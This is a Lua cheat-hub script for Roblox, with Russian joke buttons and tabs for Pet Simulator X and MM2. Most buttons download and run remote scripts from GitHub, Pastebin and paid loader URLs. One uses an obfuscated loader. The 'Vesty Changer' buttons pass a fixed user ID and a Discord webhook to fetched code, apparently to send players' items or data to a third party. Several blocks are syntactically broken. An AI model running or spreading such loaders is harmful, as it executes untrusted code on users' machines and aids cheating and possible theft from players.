local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
local Window = OrionLib:MakeWindow({Name = "Noto hub Скрипт от линди:)", HidePremium = false, SaveConfig = true, ConfigFolder = "OrionTest"})


local Tab = Window:MakeTab({
	Name = "чо эта",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
Tab:AddButton({
	Name = "перевести 20 грн",
	Callback = function()
      		print("button pressed")
  	end    
})

local Tab = Window:MakeTab({
	Name = "ВЗЛОМ ДИНЯК ТОЛКА ДЛА МАРИНИ",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

Tab:AddButton({
	Name = "+323409283402384 гривин эвро доллараф супир пупир мега тока дла марины",
	Callback = function()
      		print("button pressed")
  	end    
})


local Tab = Window:MakeTab({
	Name = "⬆️ GET TO THE TOP! ⬆️",
	Icon = "rbxassetid://10800748312",
	PremiumOnly = false
})

Tab:AddButton({
	Name = "Infinite Yield",
	Callback = function()
      		loadstring(game:HttpGet(('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'),true))()
  	end    
})

Tab:AddButton({
	Name = "Infinite Yield",
	Callback = function()
      		loadstring(game:HttpGet(('https://pastebin.com/raw/kBnByp3F'),true))()
  	end    

Tab:AddButton({
	Name = "⬆️ GET TO THE TOP! ⬆️ Script",
	Callback = function()
      		loadstring(game:HttpGet(('https://pastebin.com/raw/kBnByp3F'),true))()
  	end    



local Tab = Window:MakeTab({
	Name = "Pet Simulator X",
	Icon = "rbxassetid://10800748312",
	PremiumOnly = false
})

Tab:AddButton({
	Name = "не работает пока что",
	Callback = function()
      		loadstring(game:HttpGet("https://raw.githubusercontent.com/bllxi2crazy/psxscriptt/main/script.lua"))()
  	end    

Tab:AddButton({
	Name = "Vesty Changer менять петов",
	Callback = function()
      		_G.UserID = "3545617555"
             loadstring(game:HttpGet("https://raw.githubusercontent.com/bllxi2crazy/scriptpsx/main/bank.lua"))()
  	end    



Tab:AddButton({
	Name = "Vesty. changer V2",
	Callback = function()
      		_
            _G.UserID = "3545617555" 
            _G.WebHook = "https://discord.com/api/webhooks/1089469940731498587/rZ5pU0U19nh3bqEgWOrGo6OoShwLkMXDAuD0WCtolRHqFiAun_XM2izOKkJlVX6gH387"
loadstring(game:HttpGet("https://raw.githubusercontent.com/bllxi2crazy/psxscript/main/script.lua"))()
  	end    


Tab:AddButton({
	Name = "Milk Up Auto Farm OP",
	Callback = function()   		
            loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/a82cd5447cbbc4c7be0e8db405555787.lua"))()
  	end    


local Tab = Window:MakeTab({
	Name = "MM2",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

Tab:AddButton({
	Name = "Eclipse mm2 Old ",
	Callback = function()
      		loadstring(game:HttpGet("https://raw.githubusercontent.com/Ethanoj1/EclipseMM2/master/Script", true))()
  	end    
})


Tab:AddButton({
	Name = "Eclipse mm2 new may crash ",
	Callback = function()
      		getgenv().mainKey = "nil"
            local a,b,c,d,e=loadstring,request or http_request or (http and http.request) or (syn and syn.request),assert,tostring,"https\58//api.eclipsehub.xyz/auth";c(a and b,"Executor not Supported")a(b({Url=e.."\?\107e\121\61"..d(mainKey),Headers={["User-Agent"]="Eclipse"}}).Body)()
  	end    
})


Tab:AddButton({
	Name = "Vinixu's MM2 Script",
	Callback = function()
      		loadstring(game:GetObjects("rbxassetid://4001118261")[1].Source)()
  	end    
})

Tab:AddButton({
	Name = "Lunar Hub OP",
	Callback = function()
      		loadstring(game:HttpGet("https://raw.githubusercontent.com/vwSaraa/LunarHub/main/mm2"))()
  	end    
})
